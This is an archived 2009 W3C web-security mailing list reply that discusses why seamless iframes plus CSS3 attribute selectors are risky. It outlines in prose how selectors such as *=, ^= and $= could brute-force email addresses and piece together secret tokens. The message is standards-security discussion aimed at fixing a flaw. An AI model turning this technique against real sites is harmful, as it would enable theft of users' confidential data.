W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Re: Seamless iframes + CSS3 selectors = bad idea

From: gaz Heyes <gazheyes@gmail.com>
Date: Tue, 8 Dec 2009 10:01:31 +0000
Message-ID: <252dd75b0912080201i3954a934y1d2e2567d67b801d@mail.gmail.com>
To: Adam Barth <w3c@adambarth.com>
Cc: Daniel Glazman <daniel@glazman.org>, Thomas Roessler <tlr@w3.org>, public-web-security@w3.org
2009/12/8 Adam Barth <w3c@adambarth.com>

> Also, what about confidential
> information written in the page, like account numbers or social
> security numbers?  I don't see why all the secrets must necessarily be
> stored in value attributes of input elements.
>

Yeah account numbers would be very easy to get and require less rules. Any
data that is realistically bruteforced with CSS rules is a target. But the
*= selector is quite dangerous because you can do a word search of values.
Me and Sirdarckcat were discussing using the start/end selectors to acquire
an email address for example. It isn't as difficult as it first seems, you
match the TLDs at the end $=.com then use a dictionary attack on the value
before the @ so ^="foo@" ^="bar@" etc then use the *= selector to find the
letters of the domain and find the anagram.

Also you could steal tokens by checking for overlapping values, so you know
the start and end, you know which characters the token doesn't contain, you
know the three character patterns it does contain. You could then jigsaw the
pieces together to form the token.
Received on Tuesday, 8 December 2009 10:02:11 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Sunday, 19 December 2010 00:16:01 GMT